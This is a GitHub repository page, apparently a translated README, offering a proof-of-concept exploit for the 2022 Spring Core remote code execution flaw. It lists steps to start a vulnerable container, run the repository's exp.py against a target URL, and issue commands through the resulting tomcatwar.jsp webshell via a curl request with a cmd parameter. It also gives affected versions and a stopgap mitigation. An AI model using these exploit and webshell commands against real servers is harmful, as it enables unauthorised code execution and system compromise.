Skip to content

Bmebme/SpringCore0day

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

How to reproduce

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

python3 ./exp.py --url http://192.168.0.11:8082

curl --output - "http://192.168.0.11:8082/tomcatwar.jsp?pwd=j&cmd=id"

Spring Core RCE

After Spring Cloud, on 3.29, another major Spring vulnerability was reported online: Spring Core RCE

(Note from craig: Spring Cloud exploit here: https://github.com/hktalent/spring-spel-0day-poc)

coded poc in circulation

** currently exp has been uploaded exp.py ** circulating coded poc awkward situation

The official Spring patch is also in active production

Link to patches in production for Spring

The vulnerability affects

  1. jdk version 9 and above
  2. using Spring Framework or derivative frameworks

Vulnerability Fix Recommendations

Currently, Spring has not released a patch, so we recommend lowering the jdk version as a temporary solution.

Translated with www.DeepL.com/Translator (free version)

About

SpringCore0day from https://share.vx-underground.org/

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%